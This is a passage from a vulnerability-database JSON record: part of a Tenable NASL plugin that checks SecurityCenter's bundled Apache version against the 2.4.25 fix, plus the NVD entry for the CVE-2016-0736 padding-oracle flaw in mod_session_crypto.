script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"securitycenter_installed.nbin\", \"securitycenter_detect.nbin\");\n script_require_ports(\"Host/SecurityCenter/Version\", \"installed_sw/SecurityCenter\", \"Host/SecurityCenter/support/httpd/version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"install_func.inc\");\n\napp = \"Apache (within SecurityCenter)\";\nfix = \"2.4.25\";\n\nsc_ver = get_kb_item(\"Host/SecurityCenter/Version\");\nport = 0;\nif(empty_or_null(sc_ver))\n{\n port = 443;\n install = get_single_install(app_name:\"SecurityCenter\", combined:TRUE, exit_if_unknown_ver:TRUE);\n sc_ver = install[\"version\"];\n}\nif (empty_or_null(sc_ver)) audit(AUDIT_NOT_INST, \"SecurityCenter\");\n\nversion = get_kb_item(\"Host/SecurityCenter/support/httpd/version\");\nif (empty_or_null(version)) audit(AUDIT_UNKNOWN_APP_VER, app);\n\nif (ver_compare(ver:version, minver:\"2.3\", fix:fix, strict:FALSE) < 0)\n{\n report =\n '\\n SecurityCenter version : ' + sc_ver +\n '\\n SecurityCenter Apache version : ' + version +\n '\\n Fixed Apache version : ' + fix +\n '\\n';\n security_report_v4(port:port, severity:SECURITY_HOLE, extra:report);\n exit(0);\n}\nelse audit(AUDIT_INST_VER_NOT_VULN, app, version);\n", "cvss": {"score": 5.1, "vector": "AV:N/AC:H/Au:N/C:P/I:P/A:P"}}], "cve": [{"lastseen": "2019-08-16T11:52:57", "bulletinFamily": "NVD", "description": "In Apache HTTP Server versions 2.4.0 to 2.4.23, mod_session_crypto was encrypting its data/cookie using the configured ciphers with possibly either CBC or ECB modes of operation (AES256-CBC by default), hence no selectable or builtin authenticated encryption. This made it vulnerable to padding oracle attacks, particularly with CBC.", "modified": "2018-04-25T01:29:00", "id": "CVE-2016-0736", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-0736", "published": "2017-07-27T21:29:00", "title": "CVE-2016-0736", "type": "cve", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}]}
